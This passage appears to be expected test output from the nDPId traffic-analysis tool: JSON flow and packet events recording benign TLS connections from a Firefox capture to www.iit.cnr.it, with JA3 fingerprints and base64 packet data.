-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} 
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} 
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} 
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
